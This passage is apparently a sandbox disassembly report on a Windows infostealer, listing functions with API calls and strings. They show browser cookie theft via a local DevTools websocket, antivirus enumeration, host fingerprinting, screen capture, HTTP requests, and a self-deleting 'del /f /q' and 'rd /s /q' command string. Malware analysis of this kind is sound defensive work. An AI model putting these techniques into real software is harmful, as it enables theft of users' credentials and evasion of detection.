lstrcpyA.KERNEL32(?,00000000), ref: 0062557C
lstrcpyA.KERNEL32(?,00000000), ref: 006255B7
strtok_s.MSVCRT ref: 006256CB

Strings

false, xrefs: 006253F2
true, xrefs: 006253D3

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: 4d1eddec1795f41b0e2383b7f819e4efe318773c30007ea9add254bc4f525248
Instruction ID: 6eec4bed867a182f89cc673f697bc060bd604bd05c75dd1c6bcfe6ad27617ad1
Opcode Fuzzy Hash: 4d1eddec1795f41b0e2383b7f819e4efe318773c30007ea9add254bc4f525248
Instruction Fuzzy Hash: 0BB159759006299FDB60EB14EC89AC9B3B9FB18301F1005EAE54AA7261DF70AFC58F54

Function 00618B39 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 177stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00617E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00617E3C

_memset.LIBCMT ref: 00618C21
lstrcatA.KERNEL32(?,ws://localhost:9223,?,00000000,?), ref: 00618C3B
lstrcatA.KERNEL32(?,00000000), ref: 00618C5A

Part of subcall function 0062045E: _memmove.LIBCMT ref: 00620478

Strings

.txt, xrefs: 00618D6F
localhost, xrefs: 00618BB4
Cookies, xrefs: 00618D13
ws://localhost:9223, xrefs: 00618C2F
/devtools, xrefs: 00618BDA

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$InternetOpen_memmove_memset
String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
API String ID: 216805803-4155744131
Opcode ID: 83b929a03c703b77ad1e06b890226d544960e547f87170da9ddac8be39e567b0
Instruction ID: b8dcb675edf27e9980fa775ef713dd44f19f8673f2544c065ffe8fc11137d0a9
Opcode Fuzzy Hash: 83b929a03c703b77ad1e06b890226d544960e547f87170da9ddac8be39e567b0
Instruction Fuzzy Hash: 6F612D71D40A2D9FDB60EB64DC46BDE77B9AF08702F4044E9A608A7181DB70ABC5CF54

Function 0061515F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006151A6
RtlAllocateHeap.NTDLL(00000000), ref: 006151AD
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 006151CF
StrCmpCA.SHLWAPI(?), ref: 006151E9
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00615219
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00615258
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00615288
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00615293
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 006152BC
InternetReadFile.WININET(?,?,00000400,?), ref: 00615302
InternetCloseHandle.WININET(?), ref: 00615361
InternetCloseHandle.WININET(?), ref: 0061536D
InternetCloseHandle.WININET(?), ref: 00615379

Strings

GET, xrefs: 0061524D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: 2e709f3ef49f1f5110f5dce0fa466fb3961f0c80dfa7dd32604ad8dbbb2cc59c
Instruction ID: b2218cee1db02f29b2b98e5478b1e518e04b071d17b15d8b2239f23cae61f108
Opcode Fuzzy Hash: 2e709f3ef49f1f5110f5dce0fa466fb3961f0c80dfa7dd32604ad8dbbb2cc59c
Instruction Fuzzy Hash: E2510B75900A2CAFDB209F64DC85BEFBBB9FB09356F0444A5BA05A2250DB755FC08F90

Function 00622E5F Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00647816,00000000,?,?), ref: 00622ECF
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00622F0C
wsprintfA.USER32 ref: 00622F39
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00622F58
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00622F8E
lstrlenA.KERNEL32(?), ref: 00622FA3

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00647E28), ref: 00623038
RegCloseKey.ADVAPI32(?), ref: 006230A2
RegCloseKey.ADVAPI32(?), ref: 006230C2
RegCloseKey.ADVAPI32(?), ref: 006230CE

Strings

?, xrefs: 00622EBF
%s\%s, xrefs: 00622F33
- , xrefs: 00623042
xd, xrefs: 00622E7E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?$xd
API String ID: 2394436309-2052008882
Opcode ID: 65065ed2d9a1ae24f20b5830ce1749bb59736b70ee6ec89a7a265cb07d066fcb
Instruction ID: e75e4b246c28ea26e24a5fb4368520744c37796ae2dade9eb85b9dd33bdd844a
Opcode Fuzzy Hash: 65065ed2d9a1ae24f20b5830ce1749bb59736b70ee6ec89a7a265cb07d066fcb
Instruction Fuzzy Hash: 0361057190062DEAEF20DB25ED84EDAB7B9FB45300F1046E6A608A2111DF35AFC9CF54

Function 006235F3 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 006235FA
CoInitializeEx.OLE32(00000000,00000000,00000030,00625CA4,?,AV: ,00647904,Install Date: ,006478F0,00000000,Windows: ,006478E0,Work Dir: In memory,006478C8), ref: 00623609
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0062361A
CoCreateInstance.OLE32(00643F70,00000000,00000001,00643EA0,?), ref: 00623634
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0062366A
VariantInit.OLEAUT32(?), ref: 006236B9

Part of subcall function 0062399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,006236DC,?), ref: 006239A6
Part of subcall function 0062399E: CharToOemW.USER32(?,00000000), ref: 006239B2

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

VariantClear.OLEAUT32(?), ref: 006236E7

Strings

Unknown, xrefs: 006236FC
displayName, xrefs: 006236CB
root\SecurityCenter2, xrefs: 0062364C
Unknown, xrefs: 006236F5
Unknown, xrefs: 00623710
Select * From AntiVirusProduct, xrefs: 0062367F
WQL, xrefs: 00623684

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: a80cf322a44bf7087cac073ff2e083aeee15c0f8223119a81eadaf523951f273
Instruction ID: 2064bb26165176430f4bb142ab52a50f363de8127c44dc9a1c46cee85d9f2b7b
Opcode Fuzzy Hash: a80cf322a44bf7087cac073ff2e083aeee15c0f8223119a81eadaf523951f273
Instruction Fuzzy Hash: 96316DB1A00365BBDB109B91DC49EAFBB7EEFC6B10F104109F611EB290D7B49A45CB24

Function 00611274 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00611297
_memset.LIBCMT ref: 006112A6
lstrcatA.KERNEL32(?,0064BC0C), ref: 006112C0
lstrcatA.KERNEL32(?,0064BC10), ref: 006112CE
lstrcatA.KERNEL32(?,0064BC14), ref: 006112DC
lstrcatA.KERNEL32(?,0064BC18), ref: 006112EA
lstrcatA.KERNEL32(?,0064BC1C), ref: 006112F8
lstrcatA.KERNEL32(?,0064BC20), ref: 00611306
lstrcatA.KERNEL32(?,0064BC24), ref: 00611314
lstrcatA.KERNEL32(?,0064BC28), ref: 00611322
lstrcatA.KERNEL32(?,0064BC2C), ref: 00611330
lstrcatA.KERNEL32(?,0064BC30), ref: 0061133E
lstrcatA.KERNEL32(?,0064BC34), ref: 0061134C
lstrcatA.KERNEL32(?,0064BC38), ref: 0061135A
lstrcatA.KERNEL32(?,0064BC3C), ref: 00611368

Part of subcall function 006228E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00611375), ref: 006228ED
Part of subcall function 006228E1: HeapAlloc.KERNEL32(00000000,?,?,?,00611375), ref: 006228F4
Part of subcall function 006228E1: GetComputerNameA.KERNEL32(00000000,00611375), ref: 00622908

ExitProcess.KERNEL32 ref: 006113D3

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 20445efa5a5cb10e3185d205cbf6661c34638e5a17574fd548f74f68bc21ac0b
Instruction ID: b4f11abf725ce2c0a5490a486ef8b4eea4f249c2a227e0e90db74e8d03adb279
Opcode Fuzzy Hash: 20445efa5a5cb10e3185d205cbf6661c34638e5a17574fd548f74f68bc21ac0b
Instruction Fuzzy Hash: 1941B3B5D0422C66CB20DB708C99BDB7FAE9F16310F551992A598E7181EB70DAC48F90

Function 00629A4C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00629A71
_memset.LIBCMT ref: 00629A80
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00629A95

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

ShellExecuteEx.SHELL32(?), ref: 00629C35
_memset.LIBCMT ref: 00629C44
_memset.LIBCMT ref: 00629C56
ExitProcess.KERNEL32 ref: 00629C66

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Strings

" & exit, xrefs: 00629B64
" & rd /s /q "C:\ProgramData\, xrefs: 00629B0E
/c timeout /t 10 & del /f /q ", xrefs: 00629AC0
" & exit, xrefs: 00629BB5
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00629B6B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: c1ffd87dda7fcbcfe4d3c9495cfdfd7966587d6b1aa56eb7dcd2a306de3f4dc3
Instruction ID: 62e8709c3dae9919eeeb2fe9f4ac44112792b3c42464f73420edfdcf1b9008c1
Opcode Fuzzy Hash: c1ffd87dda7fcbcfe4d3c9495cfdfd7966587d6b1aa56eb7dcd2a306de3f4dc3
Instruction Fuzzy Hash: 1D51C8B1D4022ADBCB61EF65DC92ADDB3BDAB04704F4104E9A708B7152CB306F968F58

Function 00617E0E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00617E3C
InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 00617E6F
InternetCloseHandle.WININET(00000000), ref: 00617E7C

Strings

WebSocketClient, xrefs: 00617E31
"ws://, xrefs: 00617F4C
http://localhost:9223/json, xrefs: 00617E69
"webSocketDebuggerUrl":, xrefs: 00617F21

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
API String ID: 3289985339-1054772028
Opcode ID: a3f4f2d0033a102809a57ee545beb475922b8aa0b418820ab9885b63906471b5
Instruction ID: 958fb60ed6a9d662ad69d719253a761fc00191c0b0d74e7a846b60c862f23624
Opcode Fuzzy Hash: a3f4f2d0033a102809a57ee545beb475922b8aa0b418820ab9885b63906471b5
Instruction Fuzzy Hash: D9419471D04268AFDB21AB609C89EEF73BEAB09751F0500E5F644E3141DBB4AEC58F64

Function 006225FE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00622631
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00622671
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 006226C6
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 006226CD
wsprintfA.USER32 ref: 00622703
lstrcatA.KERNEL32(00000000,00647DD8), ref: 00622712

Part of subcall function 006232E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 006232FB
Part of subcall function 006232E0: _memset.LIBCMT ref: 0062332A
Part of subcall function 006232E0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00623352
Part of subcall function 006232E0: lstrcatA.KERNEL32(?,00647E68,?,?,?,?,?), ref: 0062336F

lstrlenA.KERNEL32(?), ref: 00622729

Part of subcall function 0062421B: malloc.MSVCRT ref: 00624220
Part of subcall function 0062421B: strncpy.MSVCRT ref: 00624231

lstrcatA.KERNEL32(00000000,00000000), ref: 0062274C

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Strings

QuBi, xrefs: 00622683
:\, xrefs: 00622662
C, xrefs: 0062263B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C$QuBi
API String ID: 1856320939-239756005
Opcode ID: 6d0d1c150c91191465ff5d3e55ce3a0436881814b89a9cec98dd265547eccd1f
Instruction ID: dbc883725beaaceb1503ebf6ef43fa428f7d0f0a63f8fd85ab9508a5395662eb
Opcode Fuzzy Hash: 6d0d1c150c91191465ff5d3e55ce3a0436881814b89a9cec98dd265547eccd1f
Instruction Fuzzy Hash: 7A41A271945229ABCB659F389D45ADEBBBDBF09301F0000E9F649E3121DA348F918F94

Function 00623BB1 Relevance: 18.1, APIs: 12, Instructions: 147COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00623BF2
GetDesktopWindow.USER32 ref: 00623C00
GetWindowRect.USER32(00000000,?), ref: 00623C0D
SelectObject.GDI32(?,00000000), ref: 00623C3A
GetHGlobalFromStream.COMBASE(?,?), ref: 00623CA5
GlobalLock.KERNEL32(?), ref: 00623CAE
GlobalSize.KERNEL32(?), ref: 00623CBA

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

